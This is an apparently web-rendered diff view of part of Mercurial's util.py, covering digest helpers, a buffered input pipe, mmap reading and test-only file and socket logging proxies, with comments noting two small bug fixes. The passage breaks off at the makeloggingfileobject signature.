40 delattr,
40 getattr,
41 getattr,
41 open,
42 open,
42 setattr,
43 setattr,
43 )
44 )
44 from hgdemandimport import tracing
45 from hgdemandimport import tracing
45 from . import (
46 from . import (
46 encoding,
47 encoding,
47 error,
48 error,
48 i18n,
49 i18n,
49 node as nodemod,
50 node as nodemod,
50 policy,
51 policy,
51 pycompat,
52 pycompat,
52 urllibcompat,
53 urllibcompat,
53 )
54 )
54 from .utils import (
55 from .utils import (
55 compression,
56 compression,
56 hashutil,
57 hashutil,
57 procutil,
58 procutil,
58 stringutil,
59 stringutil,
59 )
60 )
60
61
61 base85 = policy.importmod('base85')
62 base85 = policy.importmod('base85')
62 osutil = policy.importmod('osutil')
63 osutil = policy.importmod('osutil')
63
64
64 b85decode = base85.b85decode
65 b85decode = base85.b85decode
65 b85encode = base85.b85encode
66 b85encode = base85.b85encode
66
67
67 cookielib = pycompat.cookielib
68 cookielib = pycompat.cookielib
68 httplib = pycompat.httplib
69 httplib = pycompat.httplib
69 pickle = pycompat.pickle
70 pickle = pycompat.pickle
70 safehasattr = pycompat.safehasattr
71 safehasattr = pycompat.safehasattr
71 socketserver = pycompat.socketserver
72 socketserver = pycompat.socketserver
72 bytesio = pycompat.bytesio
73 bytesio = pycompat.bytesio
73 # TODO deprecate stringio name, as it is a lie on Python 3.
74 # TODO deprecate stringio name, as it is a lie on Python 3.
74 stringio = bytesio
75 stringio = bytesio
75 xmlrpclib = pycompat.xmlrpclib
76 xmlrpclib = pycompat.xmlrpclib
76
77
77 httpserver = urllibcompat.httpserver
78 httpserver = urllibcompat.httpserver
78 urlerr = urllibcompat.urlerr
79 urlerr = urllibcompat.urlerr
79 urlreq = urllibcompat.urlreq
80 urlreq = urllibcompat.urlreq
80
81
81 # workaround for win32mbcs
82 # workaround for win32mbcs
82 _filenamebytestr = pycompat.bytestr
83 _filenamebytestr = pycompat.bytestr
83
84
84 if pycompat.iswindows:
85 if pycompat.iswindows:
85 from . import windows as platform
86 from . import windows as platform
86 else:
87 else:
87 from . import posix as platform
88 from . import posix as platform
88
89
89 _ = i18n._
90 _ = i18n._
90
91
91 bindunixsocket = platform.bindunixsocket
92 bindunixsocket = platform.bindunixsocket
92 cachestat = platform.cachestat
93 cachestat = platform.cachestat
93 checkexec = platform.checkexec
94 checkexec = platform.checkexec
94 checklink = platform.checklink
95 checklink = platform.checklink
95 copymode = platform.copymode
96 copymode = platform.copymode
96 expandglobs = platform.expandglobs
97 expandglobs = platform.expandglobs
97 getfsmountpoint = platform.getfsmountpoint
98 getfsmountpoint = platform.getfsmountpoint
98 getfstype = platform.getfstype
99 getfstype = platform.getfstype
99 groupmembers = platform.groupmembers
100 groupmembers = platform.groupmembers
100 groupname = platform.groupname
101 groupname = platform.groupname
101 isexec = platform.isexec
102 isexec = platform.isexec
102 isowner = platform.isowner
103 isowner = platform.isowner
103 listdir = osutil.listdir
104 listdir = osutil.listdir
104 localpath = platform.localpath
105 localpath = platform.localpath
105 lookupreg = platform.lookupreg
106 lookupreg = platform.lookupreg
106 makedir = platform.makedir
107 makedir = platform.makedir
107 nlinks = platform.nlinks
108 nlinks = platform.nlinks
108 normpath = platform.normpath
109 normpath = platform.normpath
109 normcase = platform.normcase
110 normcase = platform.normcase
110 normcasespec = platform.normcasespec
111 normcasespec = platform.normcasespec
111 normcasefallback = platform.normcasefallback
112 normcasefallback = platform.normcasefallback
112 openhardlinks = platform.openhardlinks
113 openhardlinks = platform.openhardlinks
113 oslink = platform.oslink
114 oslink = platform.oslink
114 parsepatchoutput = platform.parsepatchoutput
115 parsepatchoutput = platform.parsepatchoutput
115 pconvert = platform.pconvert
116 pconvert = platform.pconvert
116 poll = platform.poll
117 poll = platform.poll
117 posixfile = platform.posixfile
118 posixfile = platform.posixfile
118 readlink = platform.readlink
119 readlink = platform.readlink
119 rename = platform.rename
120 rename = platform.rename
120 removedirs = platform.removedirs
121 removedirs = platform.removedirs
121 samedevice = platform.samedevice
122 samedevice = platform.samedevice
122 samefile = platform.samefile
123 samefile = platform.samefile
123 samestat = platform.samestat
124 samestat = platform.samestat
124 setflags = platform.setflags
125 setflags = platform.setflags
125 split = platform.split
126 split = platform.split
126 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
127 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
127 statisexec = platform.statisexec
128 statisexec = platform.statisexec
128 statislink = platform.statislink
129 statislink = platform.statislink
129 umask = platform.umask
130 umask = platform.umask
130 unlink = platform.unlink
131 unlink = platform.unlink
131 username = platform.username
132 username = platform.username
132
133
133
134
def setumask(val):
    """Set the process umask to *val*; used by the chg server.

    No-op on Windows, where umask is not meaningful.
    """
    if pycompat.iswindows:
        return
    os.umask(val)
    # keep the cached module-level copies in sync with the OS-level state
    global umask
    platform.umask = umask = val & 0o777
141
142
142
143
143 # small compat layer
144 # small compat layer
144 compengines = compression.compengines
145 compengines = compression.compengines
145 SERVERROLE = compression.SERVERROLE
146 SERVERROLE = compression.SERVERROLE
146 CLIENTROLE = compression.CLIENTROLE
147 CLIENTROLE = compression.CLIENTROLE
147
148
# recvfds is only provided by the C osutil extension on platforms that
# support it; callers are expected to probe for its presence.
try:
    recvfds = osutil.recvfds
except AttributeError:
    pass

# Python compatibility

# unique sentinel object used to distinguish "argument not supplied" from
# legitimate values such as None
_notset = object()
156
157
157
158
def bitsfrom(container):
    """Return the bitwise OR of every value in *container* (0 if empty)."""
    combined = 0
    for flag in container:
        combined |= flag
    return combined
163
164
164
165
# python 2.6 still have deprecation warning enabled by default. We do not want
# to display anything to standard user so detect if we are running test and
# only use python deprecation warning in this case.
# HGEMITWARNINGS is set by the test runner.
_dowarn = bool(encoding.environ.get(b'HGEMITWARNINGS'))
if _dowarn:
    # explicitly unfilter our warning for python 2.7
    #
    # The option of setting PYTHONWARNINGS in the test runner was investigated.
    # However, module name set through PYTHONWARNINGS was exactly matched, so
    # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
    # makes the whole PYTHONWARNINGS thing useless for our usecase.
    warnings.filterwarnings('default', '', DeprecationWarning, 'mercurial')
    warnings.filterwarnings('default', '', DeprecationWarning, 'hgext')
    warnings.filterwarnings('default', '', DeprecationWarning, 'hgext3rd')
if _dowarn and pycompat.ispy3:
    # silence warning emitted by passing user string to re.sub()
    warnings.filterwarnings(
        'ignore', 'bad escape', DeprecationWarning, 'mercurial'
    )
    warnings.filterwarnings(
        'ignore', 'invalid escape sequence', DeprecationWarning, 'mercurial'
    )
    # TODO: reinvent imp.is_frozen()
    warnings.filterwarnings(
        'ignore',
        'the imp module is deprecated',
        DeprecationWarning,
        'mercurial',
    )
194
195
195
196
def nouideprecwarn(msg, version, stacklevel=1):
    """Emit a native Python DeprecationWarning for *msg*.

    This is a noop outside of tests; prefer 'ui.deprecwarn' when a ui
    object is available.
    """
    if not _dowarn:
        return
    msg += (
        b"\n(compatibility will be dropped after Mercurial-%s,"
        b" update your code.)"
    ) % version
    warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
    # on python 3 with chg, we will need to explicitly flush the output
    sys.stderr.flush()
209
210
210
211
# map of supported digest names to their hash-object constructors
DIGESTS = {
    b'md5': hashlib.md5,
    b'sha1': hashutil.sha1,
    b'sha512': hashlib.sha512,
}
# List of digest types from strongest to weakest
DIGESTS_BY_STRENGTH = [b'sha512', b'sha1', b'md5']

# sanity check: every entry in the preference list must have a constructor
for k in DIGESTS_BY_STRENGTH:
    assert k in DIGESTS
221
222
222
223
class digester(object):
    """helper to compute digests.

    This helper can be used to compute one or more digests given their name.

    >>> d = digester([b'md5', b'sha1'])
    >>> d.update(b'foo')
    >>> [k for k in sorted(d)]
    ['md5', 'sha1']
    >>> d[b'md5']
    'acbd18db4cc2f85cedef654fccc4a4d8'
    >>> d[b'sha1']
    '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
    >>> digester.preferred([b'md5', b'sha1'])
    'sha1'
    """

    def __init__(self, digests, s=b''):
        """Create one hash object per name in *digests*; optionally hash *s*."""
        self._hashes = {}
        for k in digests:
            if k not in DIGESTS:
                raise error.Abort(_(b'unknown digest type: %s') % k)
            self._hashes[k] = DIGESTS[k]()
        if s:
            self.update(s)

    def update(self, data):
        """Feed *data* into every tracked hash object."""
        for h in self._hashes.values():
            h.update(data)

    def __getitem__(self, key):
        """Return the hex digest computed so far for digest type *key*."""
        if key not in DIGESTS:
            # fix: the original formatted this message with the stale
            # module-level loop variable 'k' instead of the requested 'key',
            # so the error always named the wrong digest type.
            raise error.Abort(_(b'unknown digest type: %s') % key)
        return nodemod.hex(self._hashes[key].digest())

    def __iter__(self):
        return iter(self._hashes)

    @staticmethod
    def preferred(supported):
        """returns the strongest digest type in both supported and DIGESTS."""

        for k in DIGESTS_BY_STRENGTH:
            if k in supported:
                return k
        return None
269
270
270
271
class digestchecker(object):
    """file handle wrapper that additionally checks content against a given
    size and digests.

    d = digestchecker(fh, size, {'md5': '...'})

    When multiple digests are given, all of them are validated.
    """

    def __init__(self, fh, size, digests):
        self._fh = fh
        self._size = size
        self._got = 0
        self._digests = dict(digests)
        self._digester = digester(self._digests.keys())

    def read(self, length=-1):
        """Read from the wrapped handle while updating size/digest state."""
        data = self._fh.read(length)
        self._digester.update(data)
        self._got += len(data)
        return data

    def validate(self):
        """Raise error.Abort unless the observed size and digests match."""
        if self._got != self._size:
            raise error.Abort(
                _(b'size mismatch: expected %d, got %d')
                % (self._size, self._got)
            )
        for name, expected in self._digests.items():
            actual = self._digester[name]
            if expected != actual:
                # i18n: first parameter is a digest name
                raise error.Abort(
                    _(b'%s mismatch: expected %s, got %s')
                    % (name, expected, actual)
                )
306
307
307
308
try:
    buffer = buffer
except NameError:
    # Python 3 has no builtin buffer(); emulate it with a zero-copy
    # memoryview slice.

    def buffer(sliceable, offset=0, length=None):
        """Return a view of *sliceable* starting at *offset*.

        When *length* is given, the view covers at most that many items.
        """
        view = memoryview(sliceable)
        if length is None:
            return view[offset:]
        return view[offset : offset + length]
316
317
317
318
318 _chunksize = 4096
319 _chunksize = 4096
319
320
320
321
class bufferedinputpipe(object):
    """a manually buffered input pipe

    Python will not let us use buffered IO and lazy reading with 'polling' at
    the same time. We cannot probe the buffer state and select will not detect
    that data are ready to read if they are already buffered.

    This class let us work around that by implementing its own buffering
    (allowing efficient readline) while offering a way to know if the buffer is
    empty from the output (allowing collaboration of the buffer with polling).

    This class lives in the 'util' module because it makes use of the 'os'
    module from the python stdlib.
    """

    def __new__(cls, fh):
        # If we receive a fileobjectproxy, we need to use a variation of this
        # class that notifies observers about activity.
        if isinstance(fh, fileobjectproxy):
            cls = observedbufferedinputpipe

        return super(bufferedinputpipe, cls).__new__(cls)

    def __init__(self, input):
        self._input = input
        # list of byte chunks read from the fd but not yet consumed
        self._buffer = []
        # True once os.read() has returned EOF
        self._eof = False
        # total number of buffered bytes (sum of the chunk lengths)
        self._lenbuf = 0

    @property
    def hasbuffer(self):
        """True is any data is currently buffered

        This will be used externally a pre-step for polling IO. If there is
        already data then no polling should be set in place."""
        return bool(self._buffer)

    @property
    def closed(self):
        # delegate to the wrapped file object
        return self._input.closed

    def fileno(self):
        return self._input.fileno()

    def close(self):
        return self._input.close()

    def read(self, size):
        # keep filling the buffer until enough data is available or EOF
        while (not self._eof) and (self._lenbuf < size):
            self._fillbuffer()
        return self._frombuffer(size)

    def unbufferedread(self, size):
        # perform at most one os.read(), but request a full chunk so later
        # calls can often be served straight from the buffer
        if not self._eof and self._lenbuf == 0:
            self._fillbuffer(max(size, _chunksize))
        return self._frombuffer(min(self._lenbuf, size))

    def readline(self, *args, **kwargs):
        if len(self._buffer) > 1:
            # this should not happen because both read and readline end with a
            # _frombuffer call that collapse it.
            self._buffer = [b''.join(self._buffer)]
            self._lenbuf = len(self._buffer[0])
        # lfi: index of the first newline within the last buffered chunk,
        # or -1 while none has been seen
        lfi = -1
        if self._buffer:
            lfi = self._buffer[-1].find(b'\n')
        while (not self._eof) and lfi < 0:
            self._fillbuffer()
            if self._buffer:
                lfi = self._buffer[-1].find(b'\n')
        size = lfi + 1
        if lfi < 0:  # end of file
            size = self._lenbuf
        elif len(self._buffer) > 1:
            # we need to take previous chunks into account
            size += self._lenbuf - len(self._buffer[-1])
        return self._frombuffer(size)

    def _frombuffer(self, size):
        """return at most 'size' data from the buffer

        The data are removed from the buffer."""
        if size == 0 or not self._buffer:
            return b''
        buf = self._buffer[0]
        if len(self._buffer) > 1:
            # collapse all pending chunks into one before slicing
            buf = b''.join(self._buffer)

        data = buf[:size]
        buf = buf[len(data) :]
        if buf:
            self._buffer = [buf]
            self._lenbuf = len(buf)
        else:
            self._buffer = []
            self._lenbuf = 0
        return data

    def _fillbuffer(self, size=_chunksize):
        """read data to the buffer"""
        # read straight from the fd (not a buffered layer) so that
        # select()-style polling on the fd stays accurate
        data = os.read(self._input.fileno(), size)
        if not data:
            self._eof = True
        else:
            self._lenbuf += len(data)
            self._buffer.append(data)

        return data
429
430
430
431
def mmapread(fp, size=None):
    """Return a read-only mmap of the first *size* bytes of *fp*.

    With size=None the whole file is mapped; an explicit size of 0, or an
    empty file, yields b'' instead of an mmap object.
    """
    if size == 0:
        # size of 0 to mmap.mmap() means "all data"
        # rather than "zero bytes", so special case that.
        return b''
    if size is None:
        size = 0
    # accept either a file object or a raw file descriptor
    fd = getattr(fp, 'fileno', lambda: fp)()
    try:
        return mmap.mmap(fd, size, access=mmap.ACCESS_READ)
    except ValueError:
        # Empty files cannot be mmapped, but mmapread should still work. Check
        # if the file is empty, and if so, return an empty buffer.
        if os.fstat(fd).st_size == 0:
            return b''
        raise
447
448
448
449
449 class fileobjectproxy(object):
450 class fileobjectproxy(object):
450 """A proxy around file objects that tells a watcher when events occur.
451 """A proxy around file objects that tells a watcher when events occur.
451
452
452 This type is intended to only be used for testing purposes. Think hard
453 This type is intended to only be used for testing purposes. Think hard
453 before using it in important code.
454 before using it in important code.
454 """
455 """
455
456
456 __slots__ = (
457 __slots__ = (
457 '_orig',
458 '_orig',
458 '_observer',
459 '_observer',
459 )
460 )
460
461
461 def __init__(self, fh, observer):
462 def __init__(self, fh, observer):
462 object.__setattr__(self, '_orig', fh)
463 object.__setattr__(self, '_orig', fh)
463 object.__setattr__(self, '_observer', observer)
464 object.__setattr__(self, '_observer', observer)
464
465
465 def __getattribute__(self, name):
466 def __getattribute__(self, name):
466 ours = {
467 ours = {
467 '_observer',
468 '_observer',
468 # IOBase
469 # IOBase
469 'close',
470 'close',
470 # closed if a property
471 # closed if a property
471 'fileno',
472 'fileno',
472 'flush',
473 'flush',
473 'isatty',
474 'isatty',
474 'readable',
475 'readable',
475 'readline',
476 'readline',
476 'readlines',
477 'readlines',
477 'seek',
478 'seek',
478 'seekable',
479 'seekable',
479 'tell',
480 'tell',
480 'truncate',
481 'truncate',
481 'writable',
482 'writable',
482 'writelines',
483 'writelines',
483 # RawIOBase
484 # RawIOBase
484 'read',
485 'read',
485 'readall',
486 'readall',
486 'readinto',
487 'readinto',
487 'write',
488 'write',
488 # BufferedIOBase
489 # BufferedIOBase
489 # raw is a property
490 # raw is a property
490 'detach',
491 'detach',
491 # read defined above
492 # read defined above
492 'read1',
493 'read1',
493 # readinto defined above
494 # readinto defined above
494 # write defined above
495 # write defined above
495 }
496 }
496
497
497 # We only observe some methods.
498 # We only observe some methods.
498 if name in ours:
499 if name in ours:
499 return object.__getattribute__(self, name)
500 return object.__getattribute__(self, name)
500
501
501 return getattr(object.__getattribute__(self, '_orig'), name)
502 return getattr(object.__getattribute__(self, '_orig'), name)
502
503
503 def __nonzero__(self):
504 def __nonzero__(self):
504 return bool(object.__getattribute__(self, '_orig'))
505 return bool(object.__getattribute__(self, '_orig'))
505
506
506 __bool__ = __nonzero__
507 __bool__ = __nonzero__
507
508
508 def __delattr__(self, name):
509 def __delattr__(self, name):
509 return delattr(object.__getattribute__(self, '_orig'), name)
510 return delattr(object.__getattribute__(self, '_orig'), name)
510
511
511 def __setattr__(self, name, value):
512 def __setattr__(self, name, value):
512 return setattr(object.__getattribute__(self, '_orig'), name, value)
513 return setattr(object.__getattribute__(self, '_orig'), name, value)
513
514
514 def __iter__(self):
515 def __iter__(self):
515 return object.__getattribute__(self, '_orig').__iter__()
516 return object.__getattribute__(self, '_orig').__iter__()
516
517
517 def _observedcall(self, name, *args, **kwargs):
518 def _observedcall(self, name, *args, **kwargs):
518 # Call the original object.
519 # Call the original object.
519 orig = object.__getattribute__(self, '_orig')
520 orig = object.__getattribute__(self, '_orig')
520 res = getattr(orig, name)(*args, **kwargs)
521 res = getattr(orig, name)(*args, **kwargs)
521
522
522 # Call a method on the observer of the same name with arguments
523 # Call a method on the observer of the same name with arguments
523 # so it can react, log, etc.
524 # so it can react, log, etc.
524 observer = object.__getattribute__(self, '_observer')
525 observer = object.__getattribute__(self, '_observer')
525 fn = getattr(observer, name, None)
526 fn = getattr(observer, name, None)
526 if fn:
527 if fn:
527 fn(res, *args, **kwargs)
528 fn(res, *args, **kwargs)
528
529
529 return res
530 return res
530
531
531 def close(self, *args, **kwargs):
532 def close(self, *args, **kwargs):
532 return object.__getattribute__(self, '_observedcall')(
533 return object.__getattribute__(self, '_observedcall')(
533 'close', *args, **kwargs
534 'close', *args, **kwargs
534 )
535 )
535
536
536 def fileno(self, *args, **kwargs):
537 def fileno(self, *args, **kwargs):
537 return object.__getattribute__(self, '_observedcall')(
538 return object.__getattribute__(self, '_observedcall')(
538 'fileno', *args, **kwargs
539 'fileno', *args, **kwargs
539 )
540 )
540
541
541 def flush(self, *args, **kwargs):
542 def flush(self, *args, **kwargs):
542 return object.__getattribute__(self, '_observedcall')(
543 return object.__getattribute__(self, '_observedcall')(
543 'flush', *args, **kwargs
544 'flush', *args, **kwargs
544 )
545 )
545
546
546 def isatty(self, *args, **kwargs):
547 def isatty(self, *args, **kwargs):
547 return object.__getattribute__(self, '_observedcall')(
548 return object.__getattribute__(self, '_observedcall')(
548 'isatty', *args, **kwargs
549 'isatty', *args, **kwargs
549 )
550 )
550
551
551 def readable(self, *args, **kwargs):
552 def readable(self, *args, **kwargs):
552 return object.__getattribute__(self, '_observedcall')(
553 return object.__getattribute__(self, '_observedcall')(
553 'readable', *args, **kwargs
554 'readable', *args, **kwargs
554 )
555 )
555
556
556 def readline(self, *args, **kwargs):
557 def readline(self, *args, **kwargs):
557 return object.__getattribute__(self, '_observedcall')(
558 return object.__getattribute__(self, '_observedcall')(
558 'readline', *args, **kwargs
559 'readline', *args, **kwargs
559 )
560 )
560
561
561 def readlines(self, *args, **kwargs):
562 def readlines(self, *args, **kwargs):
562 return object.__getattribute__(self, '_observedcall')(
563 return object.__getattribute__(self, '_observedcall')(
563 'readlines', *args, **kwargs
564 'readlines', *args, **kwargs
564 )
565 )
565
566
566 def seek(self, *args, **kwargs):
567 def seek(self, *args, **kwargs):
567 return object.__getattribute__(self, '_observedcall')(
568 return object.__getattribute__(self, '_observedcall')(
568 'seek', *args, **kwargs
569 'seek', *args, **kwargs
569 )
570 )
570
571
571 def seekable(self, *args, **kwargs):
572 def seekable(self, *args, **kwargs):
572 return object.__getattribute__(self, '_observedcall')(
573 return object.__getattribute__(self, '_observedcall')(
573 'seekable', *args, **kwargs
574 'seekable', *args, **kwargs
574 )
575 )
575
576
576 def tell(self, *args, **kwargs):
577 def tell(self, *args, **kwargs):
577 return object.__getattribute__(self, '_observedcall')(
578 return object.__getattribute__(self, '_observedcall')(
578 'tell', *args, **kwargs
579 'tell', *args, **kwargs
579 )
580 )
580
581
581 def truncate(self, *args, **kwargs):
582 def truncate(self, *args, **kwargs):
582 return object.__getattribute__(self, '_observedcall')(
583 return object.__getattribute__(self, '_observedcall')(
583 'truncate', *args, **kwargs
584 'truncate', *args, **kwargs
584 )
585 )
585
586
586 def writable(self, *args, **kwargs):
587 def writable(self, *args, **kwargs):
587 return object.__getattribute__(self, '_observedcall')(
588 return object.__getattribute__(self, '_observedcall')(
588 'writable', *args, **kwargs
589 'writable', *args, **kwargs
589 )
590 )
590
591
591 def writelines(self, *args, **kwargs):
592 def writelines(self, *args, **kwargs):
592 return object.__getattribute__(self, '_observedcall')(
593 return object.__getattribute__(self, '_observedcall')(
593 'writelines', *args, **kwargs
594 'writelines', *args, **kwargs
594 )
595 )
595
596
596 def read(self, *args, **kwargs):
597 def read(self, *args, **kwargs):
597 return object.__getattribute__(self, '_observedcall')(
598 return object.__getattribute__(self, '_observedcall')(
598 'read', *args, **kwargs
599 'read', *args, **kwargs
599 )
600 )
600
601
601 def readall(self, *args, **kwargs):
602 def readall(self, *args, **kwargs):
602 return object.__getattribute__(self, '_observedcall')(
603 return object.__getattribute__(self, '_observedcall')(
603 'readall', *args, **kwargs
604 'readall', *args, **kwargs
604 )
605 )
605
606
606 def readinto(self, *args, **kwargs):
607 def readinto(self, *args, **kwargs):
607 return object.__getattribute__(self, '_observedcall')(
608 return object.__getattribute__(self, '_observedcall')(
608 'readinto', *args, **kwargs
609 'readinto', *args, **kwargs
609 )
610 )
610
611
611 def write(self, *args, **kwargs):
612 def write(self, *args, **kwargs):
612 return object.__getattribute__(self, '_observedcall')(
613 return object.__getattribute__(self, '_observedcall')(
613 'write', *args, **kwargs
614 'write', *args, **kwargs
614 )
615 )
615
616
616 def detach(self, *args, **kwargs):
617 def detach(self, *args, **kwargs):
617 return object.__getattribute__(self, '_observedcall')(
618 return object.__getattribute__(self, '_observedcall')(
618 'detach', *args, **kwargs
619 'detach', *args, **kwargs
619 )
620 )
620
621
621 def read1(self, *args, **kwargs):
622 def read1(self, *args, **kwargs):
622 return object.__getattribute__(self, '_observedcall')(
623 return object.__getattribute__(self, '_observedcall')(
623 'read1', *args, **kwargs
624 'read1', *args, **kwargs
624 )
625 )
625
626
626
627
class observedbufferedinputpipe(bufferedinputpipe):
    """A variation of bufferedinputpipe that is aware of fileobjectproxy.

    ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
    bypass ``fileobjectproxy``, so this subclass notifies the proxy's
    observer about those events itself. It also re-publishes the
    higher-level ``read()`` and ``readline()`` events.
    """

    def _notify(self, event, res, *extra):
        # Invoke the observer's handler for ``event``, if it defines one.
        handler = getattr(self._input._observer, event, None)
        if handler:
            handler(res, *extra)

    def _fillbuffer(self):
        res = super(observedbufferedinputpipe, self)._fillbuffer()
        self._notify('osread', res, _chunksize)
        return res

    # We use different observer methods because the operation isn't
    # performed on the actual file object but on us.
    def read(self, size):
        res = super(observedbufferedinputpipe, self).read(size)
        self._notify('bufferedread', res, size)
        return res

    def readline(self, *args, **kwargs):
        res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
        self._notify('bufferedreadline', res)
        return res
667
668
668
669
# Socket methods that are intercepted by the proxy (everything else is
# delegated straight to the wrapped socket via __getattribute__).
PROXIED_SOCKET_METHODS = {
    'makefile',
    'recv',
    'recvfrom',
    'recvfrom_into',
    'recv_into',
    'send',
    'sendall',
    'sendto',
    'setblocking',
    'settimeout',
    'gettimeout',
    'setsockopt',
}


class socketproxy(object):
    """A proxy around a socket that tells a watcher when events occur.

    This is like ``fileobjectproxy`` except for sockets.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """

    __slots__ = (
        '_orig',  # the wrapped socket
        '_observer',  # object whose same-named methods are notified of calls
    )

    def __init__(self, sock, observer):
        # object.__setattr__ is used because our own __setattr__ forwards
        # to the wrapped socket.
        object.__setattr__(self, '_orig', sock)
        object.__setattr__(self, '_observer', observer)

    def __getattribute__(self, name):
        # Intercepted methods resolve on the proxy; everything else is
        # looked up on the wrapped socket.
        if name in PROXIED_SOCKET_METHODS:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, '_orig'), name)

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, '_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, '_orig'), name, value)

    def __nonzero__(self):
        return bool(object.__getattribute__(self, '_orig'))

    __bool__ = __nonzero__

    def _observedcall(self, name, *args, **kwargs):
        """Call ``name`` on the wrapped socket, then notify the observer.

        The observer's same-named method (if any) receives the call's
        result followed by the original arguments. Returns the wrapped
        call's result.
        """
        # Call the original object.
        orig = object.__getattribute__(self, '_orig')
        res = getattr(orig, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        observer = object.__getattribute__(self, '_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res

    def makefile(self, *args, **kwargs):
        res = object.__getattribute__(self, '_observedcall')(
            'makefile', *args, **kwargs
        )

        # The file object may be used for I/O. So we turn it into a
        # proxy using our observer.
        observer = object.__getattribute__(self, '_observer')
        return makeloggingfileobject(
            observer.fh,
            res,
            observer.name,
            reads=observer.reads,
            writes=observer.writes,
            logdata=observer.logdata,
            logdataapis=observer.logdataapis,
        )

    def recv(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'recv', *args, **kwargs
        )

    def recvfrom(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'recvfrom', *args, **kwargs
        )

    def recvfrom_into(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'recvfrom_into', *args, **kwargs
        )

    def recv_into(self, *args, **kwargs):
        # Fix: this previously forwarded the misspelled name 'recv_info',
        # which made every recv_into() call raise AttributeError on the
        # wrapped socket and bypassed the observer entirely.
        return object.__getattribute__(self, '_observedcall')(
            'recv_into', *args, **kwargs
        )

    def send(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'send', *args, **kwargs
        )

    def sendall(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'sendall', *args, **kwargs
        )

    def sendto(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'sendto', *args, **kwargs
        )

    def setblocking(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'setblocking', *args, **kwargs
        )

    def settimeout(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'settimeout', *args, **kwargs
        )

    def gettimeout(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'gettimeout', *args, **kwargs
        )

    def setsockopt(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'setsockopt', *args, **kwargs
        )
806
807
807
808
class baseproxyobserver(object):
    """Shared state and payload-logging helper for proxy observers."""

    def __init__(self, fh, name, logdata, logdataapis):
        self.fh = fh  # file object receiving the log output
        self.name = name  # label prefixed to every log line
        self.logdata = logdata  # whether payload bytes are logged
        self.logdataapis = logdataapis  # whether API call lines are logged

    def _writedata(self, data):
        """Append ``data`` (escaped) to the log, honoring the flags."""
        # Payload logging disabled: just terminate the API line, if any.
        if not self.logdata:
            if self.logdataapis:
                self.fh.write(b'\n')
                self.fh.flush()
            return

        if b'\n' in data:
            # Data with newlines is written to multiple lines.
            if self.logdataapis:
                self.fh.write(b':\n')

            for piece in data.splitlines(True):
                self.fh.write(
                    b'%s> %s\n' % (self.name, stringutil.escapestr(piece))
                )
            self.fh.flush()
            return

        # Simple case writes all data on a single line.
        if self.logdataapis:
            self.fh.write(b': %s\n' % stringutil.escapestr(data))
        else:
            self.fh.write(
                b'%s> %s\n' % (self.name, stringutil.escapestr(data))
            )
        self.fh.flush()
843
844
844
845
class fileobjectobserver(baseproxyobserver):
    """Logs file object activity.

    Each handler receives the result of the proxied call (``res``)
    followed by the call's original arguments, writes a description of
    the event to ``self.fh``, and logs the payload via
    ``baseproxyobserver._writedata()``. Read and write events can be
    toggled independently with the ``reads``/``writes`` flags.
    """

    def __init__(
        self, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
    ):
        super(fileobjectobserver, self).__init__(fh, name, logdata, logdataapis)
        # Event-class toggles: skip read/write events when disabled.
        self.reads = reads
        self.writes = writes

    def read(self, res, size=-1):
        if not self.reads:
            return
        # Python 3 can return None from reads at EOF instead of empty strings.
        if res is None:
            res = b''

        if size == -1 and res == b'':
            # Suppress pointless read(-1) calls that return
            # nothing. These happen _a lot_ on Python 3, and there
            # doesn't seem to be a better workaround to have matching
            # Python 2 and 3 behavior. :(
            return

        if self.logdataapis:
            self.fh.write(b'%s> read(%d) -> %d' % (self.name, size, len(res)))

        self._writedata(res)

    def readline(self, res, limit=-1):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(b'%s> readline() -> %d' % (self.name, len(res)))

        self._writedata(res)

    def readinto(self, res, dest):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> readinto(%d) -> %r' % (self.name, len(dest), res)
            )

        # ``res`` is the number of bytes read (or None); log only the
        # portion of the destination buffer that was actually filled.
        data = dest[0:res] if res is not None else b''

        # _writedata() uses "in" operator and is confused by memoryview because
        # characters are ints on Python 3.
        if isinstance(data, memoryview):
            data = data.tobytes()

        self._writedata(data)

    def write(self, res, data):
        if not self.writes:
            return

        # Python 2 returns None from some write() calls. Python 3 (reasonably)
        # returns the integer bytes written.
        if res is None and data:
            res = len(data)

        if self.logdataapis:
            self.fh.write(b'%s> write(%d) -> %r' % (self.name, len(data), res))

        self._writedata(data)

    def flush(self, res):
        if not self.writes:
            return

        self.fh.write(b'%s> flush() -> %r\n' % (self.name, res))

    # For observedbufferedinputpipe.
    def bufferedread(self, res, size):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> bufferedread(%d) -> %d' % (self.name, size, len(res))
            )

        self._writedata(res)

    def bufferedreadline(self, res):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write(
                b'%s> bufferedreadline() -> %d' % (self.name, len(res))
            )

        self._writedata(res)
943
944
944
945
def makeloggingfileobject(
    logh, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
):
